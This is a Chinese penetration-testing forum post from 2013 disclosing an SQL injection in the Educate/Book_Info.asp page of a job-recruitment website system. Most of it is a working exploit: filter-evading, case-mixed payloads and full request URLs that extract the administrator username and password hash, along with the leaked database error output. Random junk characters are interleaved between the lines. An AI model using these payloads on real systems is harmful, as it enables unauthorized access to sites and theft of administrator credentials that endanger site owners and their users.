中国网络渗透测试联盟
标题:
网络求职招聘人才网站系统正式版注入
[打印本页]
作者:
admin
时间:
2013-2-16 21:44
标题:
网络求职招聘人才网站系统正式版注入
漏洞出现在Educate/Book_Info.asp
- c' N- f" z1 S6 q0 R" w, g
5 Q- E# f/ g9 A7 E5 _7 V
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
+ E% m6 f& I! I' |" C$ o
; W" o5 Q* F8 Q6 U
exp:如下
. {8 r3 I; n2 l
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
" q4 i7 P: }8 p( F/ w
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
8 n" W+ \# c6 ^
+ U6 M5 S9 w2 ?, a7 L* i, G
http://www.xxx.com
/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
! `" X( k& x# H6 x
+ W! N( d3 f/ [3 |! @& @3 G% I
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
4 z$ z/ _$ F. K+ {
/ s$ W$ o: x7 W* `8 _
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
0 P7 d) R7 y- R5 [
' m+ ?. q* n& E3 }( z7 @! o8 O
/Educate/Book_Info.asp,行 8
" F: r1 w a- z D
1 X* S% d5 A# o2 S
http://www.xxx.com
/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
0 c y: _, }$ q
$ _# C0 A8 ?& T/ l
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
\- E( _& d( A
' }% X/ c9 Q- ^. x
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
5 b2 V: G8 T5 A* ]/ s- Y1 T9 Y: i
# x+ u) P- B1 q `0 E
/Educate/Book_Info.asp,行 8
) M, I% h0 ~" t" X8 E
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2